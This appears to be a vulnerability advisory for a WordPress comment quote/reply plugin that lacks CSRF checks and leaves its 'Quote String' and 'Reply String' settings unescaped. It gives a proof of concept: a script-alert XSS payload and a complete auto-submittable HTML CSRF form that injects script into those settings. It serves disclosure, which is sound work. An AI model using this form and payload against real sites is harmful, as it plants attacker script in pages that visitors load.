The plugin does not have any CSRF check when saving its settings, nor sanitise or escape its 'Quote String' and 'Reply String' settings before outputting them in Comments, leading to a Stored Cross-Site Scripting issue.
Put the following payload in the 'Quote String' or 'Reply String' settings of the plugin, then view a frontend page where there is a comment to trigger the XSS: <script>alert(/XSS/)</script> Via CSRF: <html> <body> <form action="https://example.com/wp-admin/options-general.php?page=jqr2c.php" method="POST"> <input type="hidden" name="jqr2c_reply" value="Reply<script>alert(/Reply/)</script>" /> <input type="hidden" name="jqr2c_quote" value="Quote<script>alert(/Quote/)</script>" /> <input type="hidden" name="jqr2c_usephp" value="1" /> <input type="hidden" name="jqr2c_position" value="bottom" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Prashant Karman Patel
Prashant Karman Patel
Yes
2021-09-21 (about 1 years ago)
2021-09-21 (about 1 years ago)
2022-04-09 (about 1 years ago)